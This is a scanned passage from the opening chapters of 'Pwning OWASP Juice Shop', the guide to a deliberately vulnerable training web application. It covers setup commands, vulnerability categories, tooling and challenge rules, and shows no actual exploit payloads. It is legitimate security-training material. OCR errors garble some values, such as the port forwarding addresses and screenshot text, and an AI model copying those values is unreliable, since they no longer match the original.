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Pwning OWASP Juice Shop 


Written by Bjorn Kimminich 


PWNING OWASP 
JUICE SHOP 





This is the official companion guide to the OWASP Juice Shop application. Being 
a web application with a vast number of intended security vulnerabilities, the 
OWASP Juice Shop is supposed to be the opposite of a best practice or template 
application for web developers: It is an awareness, training, demonstration and 
exercise tool for security risks in modern web applications. The OWASP Juice 
Shop is an open-source project hosted by the non-profit Open Web Application 
Security Project (OWASP) and is developed and maintained by volunteers. The 
content of this book was written for v9.1.0 of OWASP Juice Shop. 


The book is divided into three parts: 


Part | - Hacking preparations 


Part one helps you to get the application running and to set up optional hacking 
tools. 


Part Il - Challenge hunting 


Part two gives an overview of the vulnerabilities found in the OWASP Juice Shop 
including hints how to find and exploit them in the application. 


Part Ill - Getting involved 


Part three shows up various ways to contribute to the OWASP Juice Shop open 
source project. 


Please be aware that this book is not supposed to be a comprehensive 
introduction to Web Application Security in general. For every category of 
vulnerabilities present in the OWASP Juice Shop you will find a brief explanation - 
typically by quoting and referencing to existing content on the given topic. 


Download a .pdf, .epub, or .mobi file from: 


e https://leanpub.com/juice-shop (official release) 
e https://www.gitbook.com/book/bkimminich/pwning-owasp-juice-shop 


Read the book online at: 

e https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content 
Contribute content, suggestions, and fixes on GitHub: 

e https://github.com/bkimminich/pwning-juice-shop 
Official OWASP Juice Shop project homepage: 


e http://owasp-juice.shop 





This work is licensed under a Creative Commons Attribution-NonCommercial- 
NoDerivatives 4.0 International License. 


Why the Juice Shop exists 


To the unsuspecting user the Juice Shop just looks like a small online shop which 
sells - surprise! - fruit & vegetable juice and associated products. Except for the 
entirely overrated payment and delivery aspect of the e-commerce business, the 
Juice Shop is fully functional. But this is just the tip of the iceberg. The Juice Shop 
contains 88 challenges of varying difficulty where you are supposed to exploit 
underlying security vulnerabilities. These vulnerabilities were intentionally planted 
in the application for exactly that purpose, but in a way that actually happens in 
"real-life" web development as well! 


Your hacking progress is tracked by the application using immediate push 
notifications for successful exploits as well as a score board for progress 
overview. Finding this score board is actually one of the (easiest) challenges! The 
idea behind this is to utilize gamification techniques to motivate you to get as 
many challenges solved as possible - similar to unlocking achievements in many 
modern video games. 


Development of the Juice Shop started in September 2014 as the authors 
personal initiative, when a more modern exercise environment for an in-house 
web application security training for his employer was needed. The previously 
used exercise environment was still from the server-side rendered 
ASP/JSP/Servlet era and did not reflect the reality of current web technology any 
more. The Juice Shop was developed as open-source software without any 
corporate branding right from the beginning. Until end of 2014 most of the current 
e-commerce functionality was up and running - along with an initial number of 
planted vulnerabilities. Over the years more variants of vulnerabilities were added. 
In parallel the application was kept up-to-date with latest web technology (e.g. 
WebSockets and OAuth 2.0) and frontend frameworks (i.e. by migrating from 
AngularJS with Bootstrap to Angular with Material Design). Some of these 
additional capabilities then brought the chance to add corresponding 
vulnerabilities - and so the list of challenges kept growing ever since. 


Apart from the hacker and awareness training use case, penetration testing tools 
and automated security scanners are invited to use Juice Shop as a sort of 
guinea pig-application to check how well their products cope with JavaScript- 
heavy application frontends and REST APIs. 


Why OWASP Juice Shop? 


Every vibrant technology marketplace needs an unbiased source of 
information on best practices as well as an active body advocating open 
standards. In the Application Security space, one of those groups is the 
Open Web Application Security Project (or OWASP for short). 


The Open Web Application Security Project (OWASP) is a 501(c)(3) 
worldwide not-for-profit charitable organization focused on improving the 
security of software. Our mission is to make software security visible, so 
that individuals and organizations are able to make informed decisions. 
OWASP is in a unique position to provide impartial, practical information 
about AppSec to individuals, corporations, universities, government 
agencies and other organizations worldwide. Operating as a community of 
like-minded professionals, OWASP issues software tools and knowledge- 


based documentation on application security. | 


Two years after its inception the Juice Shop was submitted and accepted as an 
OWASP Tool Project by the Open Web Application Security Project in September 
2016. This move increased the overall visibility and outreach of the project 
significantly, as it exposed it to a large community of application security 
practitioners. 


Once in the OWASP project portfolio it took only eight months until Juice Shop 
was promoted from the initial Incubator maturity level to Lab Projects level. End of 
July 2018 the Juice Shop was promoted into the final Flagship maturity stage for 
OWASP projects. 


FLAGSHIP 


Why the name "Juice Shop"? 


In German there is a dedicated word for dump, i.e. a store that sells lousy wares 
and does not exactly have customer satisfaction as a priority: Saftladen. Reverse- 
translating this separately as Saft and Laden yields juice and shop in English. 
That is where the project name comes from. The fact that the initials JS match 
with those commonly used for JavaScript was purely coincidental and not related 
to the choice of implementation technology. 


Why the logo? 


Other than the name, the Juice Shop logo was designed explicitly with JavaScript 
in mind: 


Free Java Script computer language ... 














JavaScript 


Weitere 
ansehe 





The authors idea was to convert one of the (unofficial but popular) JavaScript 
shield-logos into a leaking juice box because it had a quite matching shape for 
this shenanigans: 





In 2017 the logo received a facelift and a spin-off when the Juice Shop introduced 
its Capture-the-flag extension (which is discussed in its own chapter Hosting a 
CTF event): 





Why yet another vulnerable web application? 


A considerable number of vulnerable web applications already existed before the 
Juice Shop was created. The OWASP Vulnerable Web Applications Directory 
(VWAD) maintains a list of these applications. When Juice Shop came to life there 
were only server-side rendered applications in the VWAD. But Rich Internet 
Application (RIA) or Single Page Application (SPA) style applications were already 
a commodity at that time. Juice Shop was meant to fill that gap. 


Many of the existing vulnerable web applications were very rudimental in their 
functional scope. So the aim of the Juice Shop also was to give the impression of 
a functionally complete e-commerce application that could actually exist like this 
in the wild. 


1, https://www.owasp.org @ 


Architecture overview 


The OWASP Juice Shop is a pure web application implemented in JavaScript and 
TypeScript (which is compiled into regular JavaScript). In the frontend the popular 
Angular framework is used to create a so-called Single Page Application. The 
user interface layout is implementing Google's Material Design using Angular 
Material components. It uses Angular Flex-Layout to achieve responsiveness. All 
icons found in the UI are originating from the Font Awesome library. 


JavaScript is also used in the backend as the exclusive programming language: 
An Express application hosted in a Node.js server delivers the client-side code to 
the browser. It also provides the necessary backend functionality to the client via 
a RESTful API. As an underlying database a light-weight SQLite was chosen, 
because of its file-based nature. This makes the database easy to create from 
scratch programmatically without the need for a dedicated server. Sequelize and 
finale-rest are used as an abstraction layer from the database. This allows to use 
dynamically created API endpoints for simple interactions (i.e. CRUD operations) 
with database resources while still allowing to execute custom SQL for more 
complex queries. 


As an additional data store a MarsDB is part of the OWASP Juice Shop. It is a 
JavaScript derivate of the widely used MongoDB NoSQL database and 
compatible with most of its query/modify operations. 


The push notifications that are shown when a challenge was successfully hacked, 
are implemented via WebSocket Protocol. The application also offers convenient 
user registration via OAuth 2.0 so users can sign in with their Google accounts. 


The following diagram shows the high-level communication paths between the 
client, server and data layers: 
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Part | - Hacking preparations 


OWASP Juice Shop offers multiple ways to be deployed and used. The author 


himself has seen it run on 


restricted corporate Windows machines 
heavily customized Linux distros 

all kinds of Apple hardware 

overclocked Windows gaming notebooks 
various cloud platforms 


Chance is pretty high that you will be able to get it running on your computer as 
well. This part of the book will help your install and run the Juice Shop as well as 


guide you through the application and some fundamental rules and hints for 


hacking it. 


Should you run into issues during installation or launch of the application, please 
do not hesitate to ask for help in the community chat or by opening a GitHub 


issue! Please just make sure that you flipped through the appendix on 


troubleshooting first. 
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Running OWASP Juice Shop 


Run options 


In the following sections you find step-by-step instructions to deploy a running 
instance of OWASP Juice Shop for your personal hacking endeavours. 


One-click cloud instance 


The quickest way to get a running instance of Juice Shop is to click the Deploy to 
Heroku button in the Setup section of the ReapmMe.md on GitHub. You have to log in 
with your Heroku account and will then receive a single instance (or dyno in 
Heroku lingo) hosting the application. If you have forked the Juice Shop repository 
on GitHub, the Deploy to Heroku button will deploy your forked version of the 
application. To deploy the latest official version you must use the button of the 
original repository at https://github.com/bkimminich/juice-shop. 


As the Juice Shop is supposed to be hacked and attacked - maybe even with 
aggressive brute-force scripts or automated scanner software - one might think 
that Heroku would not allow such activities on their cloud platform. Quite the 
opposite! When describing the intended use of Juice Shop to the Heroku support 
team they answered with: 


That sounds like a great idea. So long as you aren't asking people to DDoS 
it that should be fine. People are certainly welcome to try their luck against 
the platform and your app so long as it's not DDoS. 


As a little related anecdote, the OWASP Juice Shop was even crowned Heroku 
Button of the Month in November 2017 and once more in March 2019: 
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D 


Heroku Button 
of the Month 


O) Deploy to Heroku 


As online services become integral to our everyday 
lives, writing secure code becomes even more 
important. Learn common security pitfalls by 
deploying the OWASP Juice Shop application for 
free to Heroku and completing the challenges. The 
Juice Shop contains 48 challenges of varying 
difficulty, designed to exploit underlying security 
vulnerabilities. While the app is deploying, read all 
about the challenges here. 





Local installation 


To run the Juice Shop locally you need to have Node.js installed on your 
computer. The Juice Shop officially runs on versions 10.x and 12.x of Node.js, 
closely following the official Node.js Long-term Support Release Schedule. During 
development and Continuous Integration (CI) the application is automatically 
tested with these current versions of Node.js. The officially recommended version 
to run Juice Shop is either the most recent Long-term Support (LTS) version or 
the Current Release version. Therefore Juice Shop recommends Node.js 12.x for 
its own v9.1.0 release. 


From sources 


1. Install Node.js on your computer. 

2. On the command line run git clone https://github.com/bkimminich/juice- 
shop.git . 

3. Go into the cloned folder with cd juice-shop 

4. Run npm install . This only has to be done before the first start or after you 
changed the source code. 

5. Run npm start to launch the application. 

6. Browse to http://localhost:3000 


From pre-packaged distribution 


1. Install a 64bit Node.js on your Windows or Linux machine. 

2. Download juice-shop-<version>_<node-version>_<os>_x64.zip (or .tgz ) attached 
to the latest release on GitHub. 

3. Unpack the archive and run npm start in unpacked folder to launch the 
application 

4. Browse to http://localhost:3000 
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Docker image 


You need to have Docker installed to run Juice Shop as a container inside it. 
Following the instructions below will download the current stable version (built 
from master branch on GitHub) which internally runs the application on the 
currently recommended Node.js version 12.x. 


1. Install Docker on your computer. 
2. On the command line run docker pull bkimminich/juice-shop to download the 
latest image described above. 
3. Run docker run -d -p 3000:3000 bkimminich/juice-shop to launch the container 
with that image. 
4. Browse to hitp://localhost:3000. 


If you are using Docker on Windows - inside a VirtualBox VM - make sure that 
you also enable port forwarding from host 127.0.0.1:3e0ee to 0.0.9.e:30ee for 
TCP. 


Vagrant 


Vagrant is an open-source solution for building and maintaining virtual software 
development environments. It creates a Virtualbox VM that will launch a Docker 
container instance of the latest Juice Shop image v9.1.0. 


1. Install Vagrant and Virtualbox 

2. Run git clone https://github.com/bkimminich/juice-shop.git (or Clone your own 
fork of the repository) 

3. Run cd vagrant && vagrant up 

4. Browse to 192.168.33.10 


Amazon EC2 Instance 


You need to have an account at Amazon Web Services in order to create a server 
hosting the Juice Shop there. 


1. In the EC2 sidenav select Instances and click Launch Instance 

2. In Step 1: Choose an Amazon Machine Image (AMI) choose an Amazon 
Linux AMI or Amazon Linux 2 AMI 

3. In Step 3: Configure Instance Details unfold Advanced Details and copy the 
script below into User Data 

4. In Step 6: Configure Security Group add a Rule that opens port 80 for HTTP 

5. Launch your instance 

6. Browse to your instance's public DNS 


#!/bin/bash 

yum update -y 

yum install -y docker 

service docker start 

docker pull bkimminich/juice-shop 

docker run -d -p 80:3000 bkimminich/juice-shop 


AWS EC2 Launch Template 
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. In the EC2 sidenav select Launch Templates and click Create launch 


template 


. Under Launch template contents select as AMI ID either Amazon Linux AMI 


or Amazon Linux 2 AMI (by using Search for AMI) 


. In the same section add a Security Group that opens port 80 for HTTP 
. Unfold Advanced details at the bottom of the screen and paste in the script 


above into User Data 


. Create your launch template 
. Launch one or multiple EC2 instances from your template 
. Browse to your instance's public DNS 


Azure Container Instance 


. Open and login (via az login ) to your Azure CLI or login to the Azure Portal, 


open the CloudShell and then choose Bash (not PowerShell). 


. Create a resource group by running az group create --name <group name> -- 


location <location name, e.g. "centralus"> 


. Create a new container by running az container create --resource-group <group 


name> --name <container name> --image bkimminich/juice-shop --dns-name-label <dns 


name label> --ports 3000 --ip-address public 


. Your container will be available at http://<dns name label>.<location 


name>. azurecontainer. io: 3000 


Azure Web App for Containers 


1. 


Open your Azure CLI or login to the Azure Portal, open the CloudShell and 
then choose Bash (not PowerShell). 


. Create a resource group by running az group create --name <group name> -- 


location <location name, e.g. "East US"> 


. Create an app service plan by running az appservice plan create --name <plan 


name> --resource-group <group name> --sku S1 --is-linux 


. Create a web app with the Juice Shop Docker image by running the following 


(on one line in the bash shell) az webapp create --resource-group <group name> -- 
plan <plan name> --name <app name> --deployment-container-image-name 


bkimminich/juice-shop 


Installing a specific release version 


The installation instructions above will all give you the latest official release 


version of the Juice Shop. If you want to install a specific older version, you can 


easily do so by retrieving the corresponding tag from GitHub or Docker. For 


release v7.5.1 - which was the last version with the original AngularJS/Bootstrap 


frontend - for example: 


From sources - Run git fetch --tags and then git checkout v7.5.1 before 
running npm install 
Docker image - Run docker pull bkimminich/juice-shop:v7.5.1 instead of the 


usual docker pull bkimminich/juice-shop 
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e From pre-packaged distribution - Just download the older release from 
https://github.com/bkimminich/juice-shop/releases or 
https://sourceforge.net/projects/juice-shop/files/ 


To experience a preview of the next upcoming Juice Shop version you can do as 
follows: 


e Simply visit https://juice-shop-staging.herokuapp.com and take a look 

e From sources - Run git fetch and then git checkout develop before running 
npm install 

e Docker image - Run docker pull bkimminich/juice-shop:snapshot instead of the 


usual docker pull bkimminich/juice-shop 


@ Please be aware that support by the core team or community is limited (at best) 
for outdated and unreleased versions alike. To fully enjoy your OWASP Juice 
Shop experience, it is recommended to always use the latest version. 


Self-healing-feature 


OWASP Juice Shop was not exactly designed and built with a high availability 
and reactive enterprise-scale architecture in mind. It runs perfectly fine and fast 
when it is attacked via a browser by a human. When under attack by an 
automated tool - especially aggressive brute force scripts - the server might crash 
under the load. This could - in theory - leave the database and file system in an 
unpredictable state that prevents a restart of the application. 


That is why - in practice - Juice Shop wipes the entire database and the folder 
users might have modified during hacking. After performing this se/f-healing the 
application is supposed to be restartable, no matter what kind of problem 
originally caused it to crash. For convenience the self-healing happens during the 
start-up (i.e. npm start ) of the server, so no extra command needs to be issued to 
trigger it. 


Single-user restriction 


There is one fundamental restriction that needs to be taken into account when 
working with the OWASP Juice Shop, especially in group trainings or lectures: 


A server instance of OWASP Juice Shop is supposed to be used by only a 
single-user! 


This restriction applies to all the Run Options explained above. It is technically 
necessary to make the Se//-healing-feature work properly and consistently. 
Furthermore, when multiple users would attack the same instance of the Juice 
Shop all their progress tracking would be mixed leading to inevitable confusion for 
the individual hacker. The upcoming Challenge tracking chapter will illustrate this 
topic. 


It should not go unmentioned that it is of course okay to have multiple users hack 
the same instance from a shared machine in a kind of pair-hacking-style. 
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If you want to centrally host Juice Shop instances for multiple users you find more 
information in section Hosting individual instances for multiple users of the 
trainer's guide. 
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Vulnerability Categories 


The vulnerabilities found in the OWASP Juice Shop are categorized into several 
different classes. Most of them cover different risk or vulnerability types from well- 
known lists or documents, such as OWASP Top 10 or MITRE's Common 
Weakness Enumeration. The following table presents a mapping of the Juice 
Shop's categories to OWASP and CWE (without claiming to be complete). 


Category Breakdown 


Sensitive Data Exposure 
Injection 

Broken Authentication 
Broken Access Control 
XSS 

Improper Input Validation 
Vulnerable Components 
Cryptographic Issues 
Broken Anti Automation 
Miscellaneous 

Security through Obscurity 
Security Misconfiguration 
Insecure Deserialization 
XXE 

Unvalidated Redirects 





SEE REE EER ERE ES 


Category Mappings 


18 


Category 


Broken Access 
Control 


Broken Anti- 
Automation 


Broken 
Authentication 


Cross Site 
Scripting (XSS) 


Cryptographic 
Issues 


Improper Input 
Validation 


Injection 


Insecure 
Deserialization 


Miscellaneous 


Security 
Misconfiguration 


Security through 
Obscurity 


Sensitive Data 
Exposure 


Unvalidated 
Redirects 


Vulnerable 
Components 


XML External 
Entities (XXE) 


OWASP 
A5:2017 


OWASP-AT-004), 
OWASP-AT-010 


A2:2017 


A7:2017 


A3:2017 


ASVS V5 
A1:2017 


A8:2017 


A6:2017, A10:2017 


A3:2017, OTG- 
CONFIG-004 


A10:2013 


A9:2017 


A4:2017 
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CWE 


CWE-22, CWE-285, CWE- 
639 


CWE-362 


CWE-287, CWE-352 


CWE-79 


CWE-326, CWE-327, 
CWE-328, CWE-950 


CWE-20 


CWE-74 


CWE-502 


CWE-209 


CWE-656 


CWE-200, CWE-530, 
CWE-548 


CWE-601 


CWE-829 


CWE-611 


Challenge tracking 


The Score Board 


In order to motivate you to hunt for vulnerabilities, it makes sense to give you at 
least an idea what challenges are available in the application. Also you should 
know when you actually solved a challenge successfully, so you can move on to 
another task. Both these cases are covered by the application's score board. 


On the score board you can view a list of all available challenges with a brief 
description. Some descriptions are very explicit hacking instructions. Others are 
just vague hints that leave it up to you to find out what needs to be done. 


= MB owas? Juice shop 


Score Board 





The challenges are rated with a difficulty level between * and *#*x*«*&«* +, with 
more stars representing a higher difficulty. To make the list of challenges less 
daunting, they are clustered by difficulty. By default only the 1-star challenges are 
unfolded. You can open or collapse all challenge blocks as you like. Collapsing a 
block has no impact on whether you can solve any of its challenges. 


The difficulty ratings have been continually adjusted over time based on user 
feedback. The ratings allow you to manage your own hacking pace and learning 
curve significantly. When you pick a 5- or 6-star challenge you should expect a 
real challenge and should be less frustrated if you fail on it several times. On the 
other hand if hacking a 1- or 2-star challenge takes very long, you might realize 
quickly that you are on a wrong track with your chosen hacking approach. 


Finally, each challenge states if it is currently unsolved or solved. The current 
overall progress is represented in a progress bar on top of the score board. 
Especially in group hacking sessions this allows for a bit of competition between 
the participants. 


If not deliberately turned off (see Customization) you can hover over each 
unsolved label to see a hint for that challenge. If a "book" icon is also displayed 
within the label, you can click on it to be redirected to the corresponding hints 
section in Part 2 of this book. 
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Challenge Filters 


Additional to the filtering by difficulty, you can filter the Score Board by challenge 
categories, e.g. to focus your hacking efforts on specific vulnerabilities. You can 
also hide all solved challenges to reduce the level of distraction on the Score 
Board. 


xe. Selecting Show all for all difficulties and all challenges might impact the load 
time of the Score Board significantly! 


Success notifications 


The OWASP Juice Shop employs a simple yet powerful gamification mechanism: 
Instant success feedback! Whenever you solve a hacking challenge, a notification 
is immediately shown on the user interface. 


= (J owas Juice Shop Q Arccout E voudas Ben 


You successfully solved a challenge: Password Strength (Log i wih the administrator's user credenbals without previously changing them or applying SQL Injection.) 


a challenge: Login Aamin (Log in wit the aamintstrators user account ) 


All Products 


Apple Juice Banana Juice Carrot Juice 
(100m!) Aopo Eomae (100m!) (100m!) 
1.99 on. 4.99 
Aion: ‘Ada Baste Ad 0 Basket 


2.99 
Ada to Basket 


sasket a 





This feature makes it unnecessary to switch back and forth between the screen 
you are attacking and the score board to verify if you succeeded. Some 
challenges will force you to perform an attack outside of the Juice Shop web 
interface, e.g. by interacting with the REST API directly. In these cases the 
success notification will light up when you come back to the regular web UI the 
next time. 


To make sure you do not miss any notifications they do not disappear 
automatically after a timeout. You have to dismiss them explicitly. In case a 
number of notifications "piled up" it is not necessary to dismiss each one 
individually, as you can simply shift -click one of their X-buttons to dismiss all at 
the same time. 


Depending on your application configuration, each challenge notification might 
also show a F" symbol with a character sequence next to it. If you are doing a 
hacking session just on your own, you can completely ignore this flag. The code is 
only relevant if you are participating in a CTF event. Please refer to chapter 
Hosting a CTF event for more information this topic. 
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= IR OWASP Juice Shop 


You successfully solved a challenge: Error Handling (Provoke an error that is neither very 
gracefully nor consistently handled.) X 


E3 9c297196ecf8890bc1e900fcf3aebae8c99880a Copy to clipboard 





Automatic saving and restoring hacking 
progress 


The self-healing feature - by wiping the entire database on server start - of Juice 
Shop was advertised as a benefit just a few pages before. This feature comes at 
a cost, though: As the challenges are also part of the database schema, they will 
be wiped along with all the other data. This means, that after every restart you 
start with a clean 0% score board and all challenges in unsolved state. 


To keep the resilience against data corruption but allow users to pick up where 
they left off after a server restart, your hacking progress is automatically saved 
whenever you solve a challenge - as long as you allow Browser cookies! 


After restarting the server, once you visit the application your hacking progress is 
automatically restored: 


= OSE QA rccount W vow sasiet EN 


All Products 


Apple Juice . Banana Juice Carrot Juice 
(100ml) Cap Apple Pomace ocom) (1000mi) 
1.99 21 19 299 


The auto-save mechanism keeps your progress for up to 30 days after your 





previous hacking session. When the score board is restored to its prior state, a 
torrent of success notifications will light up - depending on how many challenges 
you solved up to that point. As mentioned earlier these can be bulk-dismissed by 
shift -clicking any of the X-buttons. 


If you want to start over with a fresh hacking session, simply click the Delete 
cookie to clear hacking progress button. After the next server restart, your score 
board will be blank. 


Potentially dangerous challenges 
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Some challenges can cause potential harm or pose some danger for your 
computer, i.e. the XXE, SSTi and Deserialization challenges as well as two of the 
NoSQLi challenges. These simply cannot be sandboxed in a 100% secure way. 
These are only dangerous if you use actually malicious payloads, so please do 
not play with payloads you do not fully understand. 


For safety reasons all potentially dangerous challenges are disabled (along with 
their underlying vulnerabilities) in containerized environments. By default this 
applies to Docker and Heroku. You can set safetyoverride: true in your YAML 
configuration file you can re-enable these challenges. Please use at your own 
risk. 


23 


Hacking exercise rules 


V Recommended hacking tools 


Browser 


When hacking a web application a good internet browser is mandatory. The 
emphasis lies on good here, so you do not want to use Internet Explorer. Other 
than that it is up to your personal preference. Chrome and Firefox both work fine 
from the authors experience. 


Browser development toolkits 


When choosing a browser to work with you want to pick one with good integrated 
(or pluggable) developer tooling. Google Chrome and Mozilla Firefox both come 
with powerful built-in DevToo/s which you can open via the F12 -key. 


When hacking a web application that relies heavily on JavaScript, it is essential 
to your success to monitor the JavaScript Console permanently! It might 
leak valuable information to you through error or debugging logs! 


4§ OWASP Juice Shop 


Lon 





Other useful features of browser DevTools are their network overview as well as 
insight into the client-side JavaScript code, cookies and other local storage being 
used by the application. 
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Tools for HTTP request tampering 


Tamper Chrome lets you monitor and - more importantly - modify HTTP requests 
before they are submitted from the browser to the server. 


Mozilla Firefox has built-in tampering capabilities and does not need a plugin. On 
the Network tab of Firefox's DevTools you have the option to Edit and Resend 
every recorded HTTP request. 


Tampering is extremely useful when probing for holes in the server-side validation 
logic. It can also be helpful when trying to bypass certain input validation or 
access restriction mechanisms, that are not properly checked on the server once 
more. 


An API testing plugin like PostMan for Chrome allows you to communicate with 
the RESTful backend of a web application directly. Skipping the UI can often be 
useful to circumvent client-side security mechanisms or simply get certain tasks 
done faster. Here you can create requests for all available HTTP verbs ( GET , 
POST , PUT, DELETE etc.) with all kinds of content-types, request headers etc. 


If you feel more at home on the command line, cur1 will do the trick just as fine 
as the recommended browser plugins. 


25 


Scripting tools 


A small number of challenges is not realistically solvable manually unless you are 
cheating or are incredibly @&-lucky. 


For these challenges you will require to write some scripts that for example can 
submit requests with different parameter values automatically in a short time. As 
long as the tool or language of choice can submit HTTP requests, you should be 
fine. Use whatever you are most familiar with. 


If you have little experience in programming, best pick a language that is easy to 
get into and will give you results without forcing you to learn a lot of syntax 
elements or write much boilerplate code. Python, Ruby or JavaScript give you this 
simplicity and ease-of-use. If you consider yourself a "command-line hero", Bash 
or PowerShell will get the job done for you. Languages like Java, C# or Perl are 
probably less suitable for beginners. In the end it depends entirely on your 
preferences, but being familiar with at least one programming language is kind of 
mandatory if you want to get 100% on the score board. 


In computer programming, boilerplate code or boilerplate refers to sections 
of code that have to be included in many places with little or no alteration. It 
is often used when referring to languages that are considered verbose, i.e. 


the programmer must write a lot of code to do minimal jobs. 1 


Penetration testing tools 


You can solve all challenges just using a browser and the plugins/tools mentioned 
above. If you are new to web application hacking (or penetration testing in 
general) this is also the recommended set of tools to start with. In case you have 
experience with professional pentesting tools, you are free to use those! And you 
are completely free in your choice, so expensive commercial products are just as 
fine as open source tools. With this kind of tooling you will have a competitive 
advantage for some of the challenges, especially those where brute force is a 
viable attack. But there are just as many multi-staged vulnerabilities in the 
OWASP Juice Shop where - at the time of this writing - automated tools would 
probably not help you at all. 


In the following sections you find some recommended pentesting tools in case 
you want to try one. Please be aware that the tools are not trivial to learn - let 
alone master. Trying to learn about the web application security basics and 
hacking tools at the same time is unlikely to get you very far in either of the two 
topics. 


intercepting proxies 


An intercepting proxy is a software that is set up as man in the middle between 
your browser and the application you want to attack. It monitors and analyzes all 
the HTTP traffic and typically lets you tamper, replay and fuzz HTTP requests in 
various ways. These tools come with lots of attack patterns built in and offer 
active as well as passive attacks that can be scripted automatically or while you 
are surfing the target application. 
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The open-source OWASP Zed Attack Proxy (ZAP) is such a software and offers 
many useful hacking tools for free: 


ZAP is an easy to use integrated penetration testing tool for finding 
vulnerabilities in web applications. It is designed to be used by people with 
a wide range of security experience and as such is ideal for developers and 
functional testers who are new to penetration testing. ZAP provides 
automated scanners as well as a set of tools that allow you to find security 


vulnerabilities manually. 


D 


Eile Edit View Analyse Report Tools Online Help 


CT aa y sebb oki o 











ý rer a | Welcome to the OWASP Zed Attack Proxy 
> http/www.softpedia.| (ZAP) 


ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web 
applications. 


Please be aware that you should only attack applications that you have been specifically 
been given permission to test. 


To quickly test an application, enter its URL below and press ‘Attack. 





URL to attack: hittp/www.softpedia.com 


& stack E stop 


Progress: Attack complete - see the Alerts tab for details of any issues found 


For a more in depth test you should explore your application using your browser or automated regression tests 
while proxying through ZAP. 


See the help file for more details. 











[a >| 
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Pentesting Linux distributions 


Instead of installing a tool such as ZAP on your computer, why not take it, add 
several hundred of other offensive security tools and put them all into a ready-to- 
use Linux distribution? Entering Kali Linux and similar toolboxes: 


Kali Linux is a Debian-based Linux distribution aimed at advanced 
Penetration Testing and Security Auditing. Kali contains several hundred 
tools aimed at various information security tasks, such as Penetration 
Testing, Forensics and Reverse Engineering.° 


The keyword in the previous quote is advanced! More precisely, Kali Linux is 
easily overwhelming when beginners try to work with it, as even the Kali 
development team states: 


As the distribution’s developers, you might expect us to recommend that 
everyone should be using Kali Linux. The fact of the matter is, however, 
that Kali is a Linux distribution specifically geared towards professional 
penetration testers and security specialists, and given its unique nature, it is 
NOT a recommended distribution if you’re unfamiliar with Linux [...]. Even 
for experienced Linux users, Kali can pose some challenges.“ 
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Although there exist some more light-weight pentesting distributions, they 
basically still present a high hurdle for people new to the IT security field. If you 
still feel up to it, give Kali Linux a try! 


Thu Mar 14, 2:26 PM 


KXANELE REGSOBES 





Internet 


You are free to use Google during your hacking session to find helpful websites or 
tools. The OWASP Juice Shop is leaking useful information all over the place if 
you know where to look, but sometimes you simply need to extend your research 
to the Internet in order to gain some relevant piece of intel to beat a challenge. 


@ Getting hints 


Frankly speaking, you are reading the premium source of hints right now! 
Congratulations! In case you want to hack more on your own than follow the 
breadcrumbs through the wood of challenges in part II, the most direct way to ask 
for specific hints for a particular challenge is the community chat on Gitter.im at 
https://gitter.im/bkimminich/juice-shop. You can simply log in to Gitter with your 
GitHub account. 


If you prefer, you can also use the project's Slack channel at 
https://owasp.slack.com/messages/project-juiceshop. You just need to self-invite 
you to OWASP 's Slack first at http://owasp.herokuapp.com. If you like it a bit more 
nostalgic, you can also join and post to the project mailing list at 
https://lists.owasp.org/mailman/listinfo/owasp_juice_shop_project. 


X Things considered cheating 


Source code 
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Juice Shop is supposed to be attacked in a "black box" manner. That means you 
cannot look into the source code to search for vulnerabilities. As the application 
tracks your successful attacks on its challenges, the code must contain checks to 
verify if you succeeded. These checks would give many solutions away 
immediately. 


The same goes for several other implementation details, where vulnerabilities 
were arbitrarily programmed into the application. These would be obvious when 
the source code is reviewed. 


Finally the end-to-end test suite of Juice Shop was built hack all challenges 
automatically, in order to verify they can all be solved. These tests deliver all the 
required attacks on a silver plate when reviewed. 


GitHub repository 


While stated earlier that "the Internet" is fine as a helpful resource, consider the 
GitHub repository htips://github.com/bkimminich/juice-shop as entirely off limits. 
First and foremost because it contains the source code (see above). 


Additionally it hosts the issue tracker of the project, which is used for idea 
management and task planning as well as bug tracking. You can of course submit 
an issue if you run into technical problems that are not covered by the 
Troubleshooting section of the README.md. You just should not read issues 
labelled challenge as they might contain spoilers or solutions. 


Of course you are explicitly allowed to view the repository's README.md page, 
which contains no spoilers but merely covers project introduction, setup and 
troubleshooting. Just do not "dig deeper" than that into the repository files and 
folders. 


Database table Challenges 


The challenges (and their progress) live in one database together with the rest of 
the application data, namely in the challenges table. Of course you could "cheat" 
by simply editing the state of each challenge from unsolved to solved by setting 
the corresponding solved column to 1. You then just have to keep your fingers 
crossed, that nobody ever asks you to demonstrate how you actually solved all 
the 4- and 5-star challenges so quickly. 


Configuration REST API Endpoint 


The Juice Shop offers a URL to retrieve configuration information which is 
required by the Customization feature that allows redressing the UI and 
overwriting the product catalog: http://localhost:3000/rest/admin/application- 
configuration 


The returned JSON contains spoilers for all challenges that depend on a product 
from the inventory which might be customized. As not all customization can be 
prepared on the server side, exposing this REST endpoint is unavoidable for the 
Customization feature to work properly. 
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Score Board HTML/CSS 


The Score Board and its features were covered in the Challenge tracking chapter. 
In the current context of "things you should not use" suffice it to say, that you 
could manipulate the score board in the web browser to make challenges appear 
as solved. Please be aware that this "cheat" is even easier (and more 
embarrassing) to uncover in a classroom training than the previously mentioned 
database manipulation: A simple reload of the score board URL will let all your 
local CSS changes vanish in a blink and reveal your rea/ hacking progress. 


1, https://en.wikipedia.org/wiki/Boilerplate_code © 


2 https://github.com/zaproxy/zap-core-help/wiki @ 


3 http://docs.kali.org/introduction/what-is-kali-linux © 


4 http://docs.kali.org/introduction/should-i-use-kali-linux © 
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Walking the "happy path" 


When investigating an application for security vulnerabilities, you should never 
blindly start throwing attack payloads at it. Instead, make sure that you 
understand how it works before attempting any exploits. 


Before commencing security testing, understanding the structure of the 
application is paramount. Without a thorough understanding of the layout of 
the application, it is unlikely that it will be tested thoroughly. Map the target 
application and understand the principal workflows. ! 


A good way to gain an understanding for the application, is to actually use it in the 
way it was meant to be used by a normal user. In regular software testing this is 
often called "happy path" testing. 


Also known as the "sunny day" scenario, the happy path is the "normal" 
path of execution through a use case or through the software that 
implements it. Nothing goes wrong, nothing out of the normal happens, and 


we swiftly and directly achieve the user's or caller's goal? 


The OWASP Juice Shop is a rather simple e-commerce application that covers 
the typical workflows of a web shop. The following sections briefly walk you 
through these "happy path" use cases. 


Browse products 


When visiting the OWASP Juice Shop you will begin on the landing page #/ 
which initially displays all products offered in the shop. Clicking on the logo in the 
top left corner of the screen will always bring you back to this screen (or more 
